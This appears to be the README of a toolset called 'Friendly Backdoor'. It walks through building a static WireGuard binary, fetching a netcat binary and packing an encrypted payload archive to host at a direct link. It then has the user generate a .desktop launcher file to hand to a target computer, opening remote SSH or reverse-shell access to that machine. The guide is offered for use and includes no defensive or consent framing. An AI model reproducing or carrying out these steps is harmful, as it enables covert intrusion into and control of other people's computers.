# Friendly Backdoor

This is a simple toolset that creates a backdoor on a target's computer for remote access.

Server and client configurations are generated for easy copying to or merging on the relevant machines.
A target `.desktop` is generated to open access on the target remote machine.

## Build

Build the statically linked `wg` binary, requires podman.

```sh
./wg-build.sh
```

Fetch the busybox netcat binary:

```sh
./nc-fetch.sh
```

Create the payload archive

```sh
./frbd.payload.sh
```

This generates `frbd.payload.tar.gz.gpg` (encrypted archive) and `frbd.payload.tar.gz.gpg.pass` (passphrase).

Upload the archive to a hosting service or add it to a git repo and remember the direct link.

## Configuration

Copy `frbd.config-template.sh` to `frbd.config.sh` and configure the options.

```sh
cp frbd.config-template.sh frbd.config.sh
```

- Fill in the `payload_url` with the direct link to the payload archive `frbd.payload.tar.gz.gpg`.
- `payload_pass` is the passphrase stored in `frbd.payload.tar.gz.gpg.pass`.
- `wg_listenport` is the port wireguard will listen on on the server. It could be different from the endpoint port if there's port forwarding configured.
- `wg_addresses` are the addresses assigned to the wireguard server.
- `wg_endpoint` should point to the hostname/ip and port of the wireguard server that is open to the internet.
- `ssh_server_hostname` is the hostname/ip of the wireguard server to connect to over ssh.
- `ssh_server_user` is the user to connect as on the wireguard server.
- `rs_port` is the reverse shell port of the target in case a ssh server can not be used.

## Generate the configuration

```sh
./frbd.gen.sh
```

It will generate the necessary files for the server in `server/`, for the client in `client/` and the `.desktop` file in `target/`.

Each subsequent invocation of the command will add a new numbered remote access configuration (e.g.: `frbd-2.desktop`, `frbd-3.desktop`).

Synchronize the updated config files with the server and client machines.

## Step by step simple setup

### Setup a server

Grab a computer or raspberry pi and deploy a linux distribution on it (e.g.: https://archlinuxarm.org/, https://manjaro.org/)

1. [Build wg](#build)
2. [Configure the settings](#configuration)
3. [Generate the configuration](#generate-the-configuration)

Setup a static ip for the server.

On the server create a `frbd` user for ssh access:

```sh
sudo useradd -m frbd
```

Create a tar archive of the server configuration and move it to the server

```sh
tar -czf server.tar.gz --owner=root --group=root -C server .
```

On the server extract it and correct the ownership

```sh
sudo tar -xzpf server.tar.gz -C /
sudo chgrp systemd-network /etc/systemd/network/frbd.netdev
sudo chown -R frbd:frbd /home/frbd
```

Make sure to enable and start `systemd-networkd.service` and `sshd.service`

```sh
sudo systemctl enable --now systemd-networkd.service
sudo systemctl enable --now sshd.service
```

Configure your router with a static ip and port forward 51820 to the same port to the static ip of the server

### Setup the client

Copy the contents of `client/` to the home folder of the client computer you want to connect from

### Target computer

Give a `frbd-*.desktop` file to computer you want remote access to and launch it from there.

### Access the target computer

From the client computer you access the wanted remote machine with

```sh
ssh frbd-*
ssh frbd-*-remote
./frbd-*-rs.sh
./frbd-*-remote-rs.sh
```
